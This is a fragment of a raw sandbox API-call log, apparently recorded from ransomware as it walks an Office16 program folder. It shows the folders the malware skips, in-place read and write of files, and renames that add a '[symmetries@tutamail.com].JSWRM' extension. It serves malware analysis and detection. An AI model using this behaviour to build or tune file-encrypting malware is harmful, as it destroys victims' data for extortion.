lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3f46636, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x211278, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="GROOVEEX.DLL", cAlternateFileName="")) returned 1 [0132.081] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2=".") returned 1 [0132.081] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="..") returned 1 [0132.081] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="...") returned 1 [0132.081] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="windows") returned -1 [0132.081] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="recovery") returned -1 [0132.081] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="perflogs") returned -1 [0132.081] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="documents and settings") returned 1 [0132.081] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="$RECYCLE.BIN") returned 1 [0132.081] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="system volume information") returned -1 [0132.081] lstrcmpiW (lpString1="GROOVEEX.DLL", lpString2="msocache") returned -1 [0132.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVEEX.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVEEX.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVEEX.DLL", lpUsedDefaultChar=0x0) returned 12 [0132.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVEEX.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVEEX.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVEEX.DLL", lpUsedDefaultChar=0x0) returned 12 [0132.082] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f2f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HeaderPatterns.xml", cAlternateFileName="HEADER~1.XML")) returned 1 [0132.082] lstrcmpiW (lpString1="HeaderPatterns.xml", lpString2=".") returned 1 [0132.082] lstrcmpiW (lpString1="HeaderPatterns.xml", lpString2="..") returned 1 [0132.082] lstrcmpiW (lpString1="HeaderPatterns.xml", lpString2="...") returned 1 [0132.082] lstrcmpiW (lpString1="HeaderPatterns.xml", lpString2="windows") returned -1 [0132.082] lstrcmpiW (lpString1="HeaderPatterns.xml", lpString2="recovery") returned -1 [0132.082] lstrcmpiW (lpString1="HeaderPatterns.xml", lpString2="perflogs") returned -1 [0132.082] lstrcmpiW (lpString1="HeaderPatterns.xml", lpString2="documents and settings") returned 1 [0132.082] lstrcmpiW (lpString1="HeaderPatterns.xml", lpString2="$RECYCLE.BIN") returned 1 [0132.082] lstrcmpiW (lpString1="HeaderPatterns.xml", lpString2="system volume information") returned -1 [0132.082] lstrcmpiW (lpString1="HeaderPatterns.xml", lpString2="msocache") returned -1 [0132.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HeaderPatterns.xml", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0132.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HeaderPatterns.xml", cchWideChar=18, lpMultiByteStr=0x241218, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HeaderPatterns.xml", lpUsedDefaultChar=0x0) returned 18 [0132.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HeaderPatterns.xml", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0132.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HeaderPatterns.xml", cchWideChar=18, lpMultiByteStr=0x241380, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HeaderPatterns.xml", lpUsedDefaultChar=0x0) returned 18 [0132.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\HeaderPatterns.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\headerpatterns.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0132.083] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=12079) returned 1 [0132.083] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.084] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2f20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x2f20, lpOverlapped=0x0) returned 1 [0132.086] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.086] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2f20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x2f20, lpOverlapped=0x0) returned 1 [0132.086] CloseHandle (hObject=0x45c) returned 1 [0132.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\HeaderPatterns.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\headerpatterns.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\HeaderPatterns.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\headerpatterns.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.087] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4e2564e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x8da50, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HVAC.DLL", cAlternateFileName="")) returned 1 [0132.087] lstrcmpiW (lpString1="HVAC.DLL", lpString2=".") returned 1 [0132.087] lstrcmpiW (lpString1="HVAC.DLL", lpString2="..") returned 1 [0132.087] lstrcmpiW (lpString1="HVAC.DLL", lpString2="...") returned 1 [0132.087] lstrcmpiW (lpString1="HVAC.DLL", lpString2="windows") returned -1 [0132.087] lstrcmpiW (lpString1="HVAC.DLL", lpString2="recovery") returned -1 [0132.087] lstrcmpiW (lpString1="HVAC.DLL", lpString2="perflogs") returned -1 [0132.087] lstrcmpiW (lpString1="HVAC.DLL", lpString2="documents and settings") returned 1 [0132.087] lstrcmpiW (lpString1="HVAC.DLL", lpString2="$RECYCLE.BIN") returned 1 [0132.087] lstrcmpiW (lpString1="HVAC.DLL", lpString2="system volume information") returned -1 [0132.087] lstrcmpiW (lpString1="HVAC.DLL", lpString2="msocache") returned -1 [0132.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVAC.DLL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0132.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVAC.DLL", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVAC.DLL", lpUsedDefaultChar=0x0) returned 8 [0132.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVAC.DLL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0132.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVAC.DLL", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVAC.DLL", lpUsedDefaultChar=0x0) returned 8 [0132.087] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc316698e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc316698e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc33c8ea0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x478a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="IEAWSDC.DLL", cAlternateFileName="")) returned 1 [0132.087] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2=".") returned 1 [0132.087] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="..") returned 1 [0132.087] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="...") returned 1 [0132.087] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="windows") returned -1 [0132.087] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="recovery") returned -1 [0132.087] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="perflogs") returned -1 [0132.087] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="documents and settings") returned 1 [0132.087] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="$RECYCLE.BIN") returned 1 [0132.088] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="system volume information") returned -1 [0132.088] lstrcmpiW (lpString1="IEAWSDC.DLL", lpString2="msocache") returned -1 [0132.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEAWSDC.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0132.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEAWSDC.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IEAWSDC.DLL", lpUsedDefaultChar=0x0) returned 11 [0132.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEAWSDC.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0132.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEAWSDC.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IEAWSDC.DLL", lpUsedDefaultChar=0x0) returned 11 [0132.088] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee295a70, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3c0f0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="IEContentService.exe", cAlternateFileName="IECONT~1.EXE")) returned 1 [0132.088] lstrcmpiW (lpString1="IEContentService.exe", lpString2=".") returned 1 [0132.088] lstrcmpiW (lpString1="IEContentService.exe", lpString2="..") returned 1 [0132.088] lstrcmpiW (lpString1="IEContentService.exe", lpString2="...") returned 1 [0132.088] lstrcmpiW (lpString1="IEContentService.exe", lpString2="windows") returned -1 [0132.088] lstrcmpiW (lpString1="IEContentService.exe", lpString2="recovery") returned -1 [0132.088] lstrcmpiW (lpString1="IEContentService.exe", lpString2="perflogs") returned -1 [0132.088] lstrcmpiW (lpString1="IEContentService.exe", lpString2="documents and settings") returned 1 [0132.088] lstrcmpiW (lpString1="IEContentService.exe", lpString2="$RECYCLE.BIN") returned 1 [0132.088] lstrcmpiW (lpString1="IEContentService.exe", lpString2="system volume information") returned -1 [0132.088] lstrcmpiW (lpString1="IEContentService.exe", lpString2="msocache") returned -1 [0132.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEContentService.exe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0132.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEContentService.exe", cchWideChar=20, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IEContentService.exe", lpUsedDefaultChar=0x0) returned 20 [0132.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEContentService.exe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0132.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEContentService.exe", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IEContentService.exe", lpUsedDefaultChar=0x0) returned 20 [0132.088] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc5f4be42, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc5f4be42, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd95d6d40, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xabb640, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="IGX.DLL", cAlternateFileName="")) returned 1 [0132.088] lstrcmpiW (lpString1="IGX.DLL", lpString2=".") returned 1 [0132.088] lstrcmpiW (lpString1="IGX.DLL", lpString2="..") returned 1 [0132.088] lstrcmpiW (lpString1="IGX.DLL", lpString2="...") returned 1 [0132.088] lstrcmpiW (lpString1="IGX.DLL", lpString2="windows") returned -1 [0132.088] lstrcmpiW (lpString1="IGX.DLL", lpString2="recovery") returned -1 [0132.088] lstrcmpiW (lpString1="IGX.DLL", lpString2="perflogs") returned -1 [0132.088] lstrcmpiW (lpString1="IGX.DLL", lpString2="documents and settings") returned 1 [0132.088] lstrcmpiW (lpString1="IGX.DLL", lpString2="$RECYCLE.BIN") returned 1 [0132.088] lstrcmpiW (lpString1="IGX.DLL", lpString2="system volume information") returned -1 [0132.089] lstrcmpiW (lpString1="IGX.DLL", lpString2="msocache") returned -1 [0132.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IGX.DLL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0132.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IGX.DLL", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IGX.DLL", lpUsedDefaultChar=0x0) returned 7 [0132.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IGX.DLL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0132.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IGX.DLL", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IGX.DLL", lpUsedDefaultChar=0x0) returned 7 [0132.089] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x19889710, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf5000, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Installed_resources16.xss", cAlternateFileName="INSTAL~1.XSS")) returned 1 [0132.089] lstrcmpiW (lpString1="Installed_resources16.xss", lpString2=".") returned 1 [0132.089] lstrcmpiW (lpString1="Installed_resources16.xss", lpString2="..") returned 1 [0132.089] lstrcmpiW (lpString1="Installed_resources16.xss", lpString2="...") returned 1 [0132.089] lstrcmpiW (lpString1="Installed_resources16.xss", lpString2="windows") returned -1 [0132.089] lstrcmpiW (lpString1="Installed_resources16.xss", lpString2="recovery") returned -1 [0132.089] lstrcmpiW (lpString1="Installed_resources16.xss", lpString2="perflogs") returned -1 [0132.089] lstrcmpiW (lpString1="Installed_resources16.xss", lpString2="documents and settings") returned 1 [0132.089] lstrcmpiW (lpString1="Installed_resources16.xss", lpString2="$RECYCLE.BIN") returned 1 [0132.089] lstrcmpiW (lpString1="Installed_resources16.xss", lpString2="system volume information") returned -1 [0132.089] lstrcmpiW (lpString1="Installed_resources16.xss", lpString2="msocache") returned -1 [0132.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Installed_resources16.xss", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0132.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Installed_resources16.xss", cchWideChar=25, lpMultiByteStr=0x2413a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Installed_resources16.xss", lpUsedDefaultChar=0x0) returned 25 [0132.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Installed_resources16.xss", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0132.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Installed_resources16.xss", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Installed_resources16.xss", lpUsedDefaultChar=0x0) returned 25 [0132.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Installed_resources16.xss" (normalized: "c:\\program files\\microsoft office\\root\\office16\\installed_resources16.xss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0132.090] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1003520) returned 1 [0132.090] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.090] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0132.110] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.110] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0132.110] CloseHandle (hObject=0x45c) returned 1 [0132.110] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Installed_resources16.xss" (normalized: "c:\\program files\\microsoft office\\root\\office16\\installed_resources16.xss"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Installed_resources16.xss.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\installed_resources16.xss.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.111] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28000, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Installed_schemas16.xss", cAlternateFileName="INSTAL~2.XSS")) returned 1 [0132.111] lstrcmpiW (lpString1="Installed_schemas16.xss", lpString2=".") returned 1 [0132.111] lstrcmpiW (lpString1="Installed_schemas16.xss", lpString2="..") returned 1 [0132.112] lstrcmpiW (lpString1="Installed_schemas16.xss", lpString2="...") returned 1 [0132.112] lstrcmpiW (lpString1="Installed_schemas16.xss", lpString2="windows") returned -1 [0132.112] lstrcmpiW (lpString1="Installed_schemas16.xss", lpString2="recovery") returned -1 [0132.112] lstrcmpiW (lpString1="Installed_schemas16.xss", lpString2="perflogs") returned -1 [0132.112] lstrcmpiW (lpString1="Installed_schemas16.xss", lpString2="documents and settings") returned 1 [0132.112] lstrcmpiW (lpString1="Installed_schemas16.xss", lpString2="$RECYCLE.BIN") returned 1 [0132.112] lstrcmpiW (lpString1="Installed_schemas16.xss", lpString2="system volume information") returned -1 [0132.112] lstrcmpiW (lpString1="Installed_schemas16.xss", lpString2="msocache") returned -1 [0132.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Installed_schemas16.xss", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Installed_schemas16.xss", cchWideChar=23, lpMultiByteStr=0x241268, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Installed_schemas16.xss", lpUsedDefaultChar=0x0) returned 23 [0132.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Installed_schemas16.xss", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Installed_schemas16.xss", cchWideChar=23, lpMultiByteStr=0x2411c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Installed_schemas16.xss", lpUsedDefaultChar=0x0) returned 23 [0132.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Installed_schemas16.xss" (normalized: "c:\\program files\\microsoft office\\root\\office16\\installed_schemas16.xss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0132.113] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=163840) returned 1 [0132.113] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.113] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0132.125] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 